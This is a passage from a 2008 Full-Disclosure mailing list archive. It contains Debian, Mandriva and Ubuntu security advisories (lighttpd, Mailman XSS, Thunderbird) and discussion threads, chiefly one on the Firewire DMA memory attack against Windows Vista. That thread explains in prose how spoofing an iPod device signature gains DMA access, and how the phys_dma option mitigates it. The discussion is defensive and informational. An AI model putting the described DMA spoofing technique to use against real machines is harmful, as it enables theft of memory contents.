http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 62884 0ccb5f79ae50fbc9967b7af053ff0e76 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 61006 84f8efd4a34a05253e02aae4ad9e666a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 67184 3bd3cb49438d49c70436d106f97de40d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 76888 b5d4d899efb03134815b04b570bb8174 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 67326 c3301e3405ea81adbcbfdb25e9175df6 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_mips.deb Size/MD5 checksum: 295944 7f5edffb4a6fa10cf0d57353d04939bc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_mips.deb Size/MD5 checksum: 58380 8f124d373348b24428af69b411966c31 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_mips.deb Size/MD5 checksum: 59762 63dbb566d233a7ca46f646e6f31db643 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_mips.deb Size/MD5 checksum: 69048 a3002e94627fbe13a92f3750767ff833 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_mips.deb Size/MD5 checksum: 62456 4b933ff37574e18d94b518d2dd1ddce1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_mips.deb Size/MD5 checksum: 62340 c62744ec6d7a84e13cda39089fc2cc40 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 69848 b01bc2ff253e183ccf000765acb86f81 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 60592 5aa70a480157629fc6caa35309371236 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 63194 a7d0666adf203cfc8a3089b7b27e7d27 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 59104 1d57b007782bbb3116113b418aa4d7c7 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 297028 96a183bd09c3ecee7899fa322a3d249f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_mipsel.deb Size/MD5 checksum: 63370 b1f2124c09cfce63f77814bdfaf89ec6 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 65218 22aa056a61b992c613453c4e42a18931 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 64942 0a52051cdf863e7f4d07a784e9b999a6 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 71590 497c515d7d21d17b47938bb3ca62c98a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 323626 5d902bf2d0dad086610eed1a3ef399ff http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 62298 5a6077d928a46f5412041586a79979a9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_powerpc.deb Size/MD5 checksum: 60480 e6b803329d925e756ebae8f3b8a25f61 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_s390.deb Size/MD5 checksum: 64456 652df202c4877e31a189fdab5d73c429 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_s390.deb Size/MD5 checksum: 71184 6a27ce3f4965c2f45063fc6a12fc95a1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_s390.deb Size/MD5 checksum: 64062 a1916058ca6929ba5ede58cd6df1c9fd http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_s390.deb Size/MD5 checksum: 59412 34187112fc60034864b8d7e4ad058010 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_s390.deb Size/MD5 checksum: 60908 f457bf75d0034e57a2b037e091f1e8bc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_s390.deb Size/MD5 checksum: 307020 9eaba4e65073194a68936c9957051597 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 63234 c488f5fd992c2e1bc594614259a81c6d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 60348 643d00ff129a367c2f3f944ec3e9085d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 58700 32e6ed5c3bec41941466a4929d1e25ab http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 283968 973579db2fff4ba527bbcfb8a78b4fb5 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 69712 a5b419803f4c7fb418291327c45ce442 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_sparc.deb Size/MD5 checksum: 63262 1748dc5be4967ff3fab5b94863e2be74 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFH0DlqwM/Gs81MDZ0RAhdHAKDWqNXksNw2GvPB32Jv6aIXZYTrfgCeOejf grjQ1I2/z2Et1It0SKt1hfk= =dNit -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Thu Mar 6 18:24:15 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 06 Mar 2008 13:24:15 -0500 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: Your message of "Thu, 06 Mar 2008 09:13:05 EST." <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> <47CEC5DF.2030000@s0ftpj.org> <47CFEE6B.6080005@s0ftpj.org> <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com> Message-ID: <14172.1204827855@turing-police.cc.vt.edu> On Thu, 06 Mar 2008 09:13:05 EST, Static Rez said: > Isn't it true that a TCP packet is typically 20 bytes, and a UDP packet > about 8? This is minus any additional data that has been added to the > packet. If this is true, then depending on the size of the pipe your sending > the data through, and the amount of congestion there might be, a UDP packet > would more easily and quickly hit its destination. If your network is so congested that the difference between a min-sized TCP packet and a min-sized UDP packet matters, you have *bigger* problems... (In reality, most NICs will refuse to blat out a packet much smaller than 64 bytes or so - there was a number of info-disclosure issues with some drivers that would try to send a 56 byte packet, and failed to zero out the 8 trailing bytes). -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/8aa4dfb4/attachment.bin From tim-security at sentinelchicken.org Thu Mar 6 20:00:09 2008 From: tim-security at sentinelchicken.org (Tim) Date: Thu, 6 Mar 2008 12:00:09 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> Message-ID: <20080306200009.GB5138@sentinelchicken.org> > What are the implications for firewire device compatibility of doing > this? I am no expert on ieee1394, but I have read up a bit on this and tested Metlstorm's memory dumping tool and here's what I understand: Firewire chipsets allow drivers to configure a particular memory range which is open to access by DMA devices. Since the memory transfers occur completely without software intervention, the only way to restrict this is to tell the chip ahead of time what to allow and what not to allow. Before these tools came out, most free OSes simply opened up access completely to physical memory for any device. However, Windows would not do this. It would only open up access to devices that it thought needed DMA. This is why Metlstorm had to make his Linux machine behave like an iPod to fool Windows into spreading it's legs. Since the exploit tools came out for this, free OSes quickly started providing options to tell the chips not to open up access. I have tested the Linux drivers with the phys_dma=0 option, and found that some disk devices worked fine while others did not. I can confirm that the memory dumping tools did not work with this option set. Of course this is not an optimal fix. The drivers should just automatically restrict the DMA accesses in real time to a range that is safe but still permits devices to use it. (Presumably to buffers allocated specifically for I/O.) Not sure if some devices would still have problems with this, but I think this is the intended operation of ieee1394 based on the specs and I'd imagine it would work on a greater number of devices than having it disabled completely. Someone please correct me if I'm wrong on any of this. tim From Larry at larryseltzer.com Thu Mar 6 20:13:33 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Thu, 6 Mar 2008 15:13:33 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <20080306200009.GB5138@sentinelchicken.org> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> >>...Windows would not do this. It would only open up access to devices that it thought needed DMA. This is why Metlstorm had to make his Linux machine behave like an iPod to fool Windows into spreading it's legs. So the iPod software opens up the whole address space? I don't get it. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From tim-security at sentinelchicken.org Thu Mar 6 20:20:28 2008 From: tim-security at sentinelchicken.org (Tim) Date: Thu, 6 Mar 2008 12:20:28 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> Message-ID: <20080306202028.GC5138@sentinelchicken.org> > >>...Windows would not do this. It would only open up access to devices > that it thought needed DMA. This is why Metlstorm had to make his Linux > machine behave like an iPod to fool Windows into spreading it's legs. > > So the iPod software opens up the whole address space? I don't get it. No, the iPod device signature makes Windows drivers think it should allow DMA access for that device because it detect it as a disk device. Other disk device signatures would likely work the same way, that's just the one he happened to emulate. tim From lericksen at sbcglobal.net Thu Mar 6 20:18:31 2008 From: lericksen at sbcglobal.net (Leif Ericksen) Date: Thu, 06 Mar 2008 14:18:31 -0600 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <20080306092153.GA1626@chaotica> <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com> Message-ID: <1204834711.2565.29.camel@shadrack.cipsecurity.us> Gee Echelon is that not OLD news like news that is over 10 years old??? I remember hearing about echelon at the very least 10-11 years ago. -- Leif Ericksen On Thu, 2008-03-06 at 20:46 +1100, Ivan . wrote: > so what? It doesn't have to make specific ascertains. The fact of the > matter is that government sponsored corporate/industrial espionage > happens all the time. > > Echelon spy network revealed > http://news.bbc.co.uk/1/hi/world/503224.stm > > Echelon: Government spying breeds business distrust > http://news.zdnet.co.uk/itmanagement/0,1000000308,2079881,00.htm > > Update: America uses Echelon to spy on Britain > http://news.zdnet.co.uk/security/0,1000000189,2079921,00.htm > > On Thu, Mar 6, 2008 at 8:21 PM, wrote: > > COULD, this article makes no specific claims. the chinese government COULD have a audio recording device hidden inside your asshole at this very moment. > > > > On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote: > > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > > > > > _______________________________________________ > > > > > > > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From tim-security at sentinelchicken.org Thu Mar 6 20:29:18 2008 From: tim-security at sentinelchicken.org (Tim) Date: Thu, 6 Mar 2008 12:29:18 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <4255c2570803061219p649b2cfr73cc8b881c49f203@mail.gmail.com> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <4255c2570803061219p649b2cfr73cc8b881c49f203@mail.gmail.com> Message-ID: <20080306202918.GE5138@sentinelchicken.org> An anonymous list lurker asked me off-list to answer this question for "public gratification": > Can this feature be leveraged without drivers on the target system? > IOW, if one just unloads (or doesn't load) the firewire driver, is it > still exploitable? No, I don't believe so. At least on Linux, the drivers have to explicitly open up access when they are loaded for the attack to work. By the chipset access restrictions are prevent this. Of course YMMV on particular pieces of hardware. There's just one vendor (Texas Instruments) who produces the vast majority of these chipsets though, so I doubt there's a large amount of variation from system to system. tim From Larry at larryseltzer.com Thu Mar 6 20:35:46 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Thu, 6 Mar 2008 15:35:46 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <20080306202028.GC5138@sentinelchicken.org> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> <20080306202028.GC5138@sentinelchicken.org> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local> >>No, the iPod device signature makes Windows drivers think it should allow DMA access for that device because it detect it as a disk device. >>Other disk device signatures would likely work the same way, that's just the one he happened to emulate. Is it not possible for Windows (or any OS) to open up DMA for a device only to a certain range? If not, what options are available? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From tim-security at sentinelchicken.org Thu Mar 6 20:44:19 2008 From: tim-security at sentinelchicken.org (Tim) Date: Thu, 6 Mar 2008 12:44:19 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> <20080306202028.GC5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local> Message-ID: <20080306204419.GG5138@sentinelchicken.org> > Is it not possible for Windows (or any OS) to open up DMA for a device > only to a certain range? > > If not, what options are available? I have various forms of RSI and don't feel like typing it again: On Thu, Mar 06, 2008 at 12:00:09PM -0800, Tim wrote: > [...] > Of course this is not an optimal fix. The drivers should just > automatically restrict the DMA accesses in real time to a range that is > safe but still permits devices to use it. (Presumably to buffers > allocated specifically for I/O.) Not sure if some devices would still > have problems with this, but I think this is the intended operation of > ieee1394 based on the specs and I'd imagine it would work on a greater > number of devices than having it disabled completely. > [...] So yes, this is possible. AFAIK, driver writers on all sides have just been lazy. At least with free OSes they have a lame hack to protect you. tim From security at mandriva.com Thu Mar 6 21:17:33 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Mar 2008 14:17:33 -0700 Subject: [Full-disclosure] [ MDVSA-2008:061 ] - Updated mailman packages fix multiple XSS vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:061 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mailman Date : March 6, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple cross-site scripting (XSS) vulnerabilities were found in Mailman prior to version 2.1.10b1, which allow remote attackers to inject arbitrary web script or HTML via edting templates and the list's info attribute in the web administrator interface. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0564 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 2b4013e38c4bbc2624150cf8b859d97b 2007.0/i586/mailman-2.1.9-1.1mdv2007.0.i586.rpm 84e8a6a1a78093bcdcf041450309993a 2007.0/SRPMS/mailman-2.1.9-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7f70c499712449927c501eec60f7257e 2007.0/x86_64/mailman-2.1.9-1.1mdv2007.0.x86_64.rpm 84e8a6a1a78093bcdcf041450309993a 2007.0/SRPMS/mailman-2.1.9-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 3e66e56114c272d5ebdfc143e317ff86 2007.1/i586/mailman-2.1.9-2.1mdv2007.1.i586.rpm 83d478c788bfda009a1ad9dce97e4916 2007.1/SRPMS/mailman-2.1.9-2.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: e3215c27c2ce3f0857bc81ba67e9caaa 2007.1/x86_64/mailman-2.1.9-2.1mdv2007.1.x86_64.rpm 83d478c788bfda009a1ad9dce97e4916 2007.1/SRPMS/mailman-2.1.9-2.1mdv2007.1.src.rpm Mandriva Linux 2008.0: c2ffce2a1332f7125f37c05fb5fc7acd 2008.0/i586/mailman-2.1.9-2.1mdv2008.0.i586.rpm d2cb3d3c79bb91a81f1cace90213384e 2008.0/SRPMS/mailman-2.1.9-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: f01417a5626e86aae6678f5ea67c3aac 2008.0/x86_64/mailman-2.1.9-2.1mdv2008.0.x86_64.rpm d2cb3d3c79bb91a81f1cace90213384e 2008.0/SRPMS/mailman-2.1.9-2.1mdv2008.0.src.rpm Corporate 3.0: 61fc3c66164c9c3880d49e477bc75fcd corporate/3.0/i586/mailman-2.1.4-2.9.C30mdk.i586.rpm 842647b66f6a5e6e6674533bbb45fa3e corporate/3.0/SRPMS/mailman-2.1.4-2.9.C30mdk.src.rpm Corporate 3.0/X86_64: 9ff6c3bf000084730904b9b1e944cf69 corporate/3.0/x86_64/mailman-2.1.4-2.9.C30mdk.x86_64.rpm 842647b66f6a5e6e6674533bbb45fa3e corporate/3.0/SRPMS/mailman-2.1.4-2.9.C30mdk.src.rpm Corporate 4.0: 5bdf3f1a62de4d8088cd3f8409fdd525 corporate/4.0/i586/mailman-2.1.6-6.3.20060mlcs4.i586.rpm fc6132d963989c475ddaed436b234039 corporate/4.0/SRPMS/mailman-2.1.6-6.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 209d068b958d077e2102c42052a5a72a corporate/4.0/x86_64/mailman-2.1.6-6.3.20060mlcs4.x86_64.rpm fc6132d963989c475ddaed436b234039 corporate/4.0/SRPMS/mailman-2.1.6-6.3.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH0DOQmqjQ0CJFipgRAun/AKCeOTnmEALAC0Psif3vTGOrTDFO1QCfWd5n xgQxJS4lADPQU5IAIMmKSds= =TWJO -----END PGP SIGNATURE----- From thor at hammerofgod.com Thu Mar 6 21:11:43 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Thu, 6 Mar 2008 13:11:43 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> Message-ID: > -----Original Message----- > From: Larry Seltzer [mailto:Larry at larryseltzer.com] > Sent: Thursday, March 06, 2008 9:51 AM > To: Peter Watkins; Roger A. Grimes > Cc: Bernhard Mueller; Full Disclosure; Bugtraq > Subject: RE: Firewire Attack on Windows Vista > > >>Roger, you should note that Adam's "Hit by a Bus" paper includes > information about how Linux users can load their OS' Firewire driver in > a way that should disallow physical memory DMA access, and close this > attack vector. > > What are the implications for firewire device compatibility of doing > this? Probably the same as just disabling the 1394 bus host controller in Vista ;) t From jamie at canonical.com Thu Mar 6 21:30:37 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Thu, 6 Mar 2008 16:30:37 -0500 Subject: [Full-disclosure] [USN-582-2] Thunderbird vulnerabilities Message-ID: <20080306213037.GB31014@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-582-2 March 06, 2008 mozilla-thunderbird https://launchpad.net/bugs/197504 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1 Ubuntu 6.10: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1 Ubuntu 7.04: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1 After a standard system upgrade you need to restart Thunderbird to effect the necessary changes. Details follow: USN-582-1 fixed several vulnerabilities in Thunderbird. The upstream fixes were incomplete, and after performing certain actions Thunderbird would crash due to memory errors. This update fixes the problem. We apologize for the inconvenience. Original advisory details: It was discovered that Thunderbird did not properly set the size of a buffer when parsing an external-body MIME-type. If a user were to open a specially crafted email, an attacker could cause a denial of service via application crash or possibly execute arbitrary code as the user. (CVE-2008-0304) Various flaws were discovered in Thunderbird and its JavaScript engine. By tricking a user into opening a malicious message, an attacker could execute arbitrary code with the user's privileges. (CVE-2008-0412, CVE-2008-0413) Various flaws were discovered in the JavaScript engine. By tricking a user into opening a malicious message, an attacker could escalate privileges within Thunderbird, perform cross-site scripting attacks and/or execute arbitrary code with the user's privileges. (CVE-2008-0415) Gerry Eisenhaur discovered that the chrome URI scheme did not properly guard against directory traversal. Under certain circumstances, an attacker may be able to load files or steal session data. Ubuntu is not vulnerable in the default installation. (CVE-2008-0418) Flaws were discovered in the BMP decoder. By tricking a user into opening a specially crafted BMP file, an attacker could obtain sensitive information. (CVE-2008-0420) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1.diff.gz Size/MD5: 457207 42edc049dc6a57799c7762fd69519cef http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1.dsc Size/MD5: 1677 308921004b21abdec87e7193b1cc1855 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227.orig.tar.gz Size/MD5: 38264877 4266e1ff163ed81a555a6198a8c2fc45 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_amd64.deb Size/MD5: 3592366 d46ea4d2567ef29fe2e29d7ea59ebe0f http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_amd64.deb Size/MD5: 194738 d64dc9355993ee4e732db61ab7d18142 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_amd64.deb Size/MD5: 59978 20504a6b397c381daaf6425c980241c9 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_amd64.deb Size/MD5: 12109986 e3f88ccf859f2cb0d4f5786ec84422f8 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_i386.deb Size/MD5: 3585640 9a6fb88d3f7606c016694a56ac686c70 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_i386.deb Size/MD5: 188106 7b9b14a14e97870b209b8917b05d6899 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_i386.deb Size/MD5: 55474 7fb01df26f2bb75b34370b547a9d2e5b http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_i386.deb Size/MD5: 10382740 287d5666f26e2cbe9cedf80236967480 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 3591026 db402f32a02f27dd4a7e789da07e9667 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 191452 a879875dcd1075a9802e0a7cf5485ae6 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 59076 9d4f1e4f5b2df85487d5cd767e42ca79 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 11661424 445a2d6d7df3c4c7aa20dc0a6772a283 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1_sparc.deb 